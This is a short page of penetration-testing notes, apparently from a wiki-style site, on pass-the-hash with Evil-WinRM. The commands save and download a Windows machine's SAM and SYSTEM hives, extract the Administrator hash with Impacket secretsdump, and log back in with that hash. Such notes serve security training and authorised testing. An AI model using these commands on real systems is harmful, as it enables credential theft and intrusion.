Pass the hash with evil WinRM

If you have admin access or privileges to dump the SAM and SYSTEM hives with Evil-WinRM, you can perform Pass-the-Hash to connect to the victim machine with elevated privileges:

First, save the SAM and SYSTEM hives using Reg in the Windows machine:

Evil-WinRM PS C:\> reg save hklm\system system.bak
The operation completed successfully.

Evil-WinRM PS C:\> reg save hklm\sam sam.bak
The operation completed successfully.

Download the saved hives to your local machine:

Evil-WinRM PS C:\> download system.bak
Info: Download successful!

Evil-WinRM PS C:\> download sam.bak
Info: Download successful!

Next, use a tool like Impacket's secretsdump.py to extract the hashes from the SAM and SYSTEM hives:
```
impacket-secretsdump -sam sam.bak -system system.bak LOCAL
```
After extracting the hashes, you'll obtain the hash for the Administrator account.

Finally, perform Pass-the-Hash to connect to the victim machine using Evil-WinRM.

evil-winrm -i [Target IP] -u [User(usually Administrator)] -H [Administrator_Hash]

PreviousExploring Configuration Files for AD Credentials NextUnderstanding Runas

Last updated 1 year ago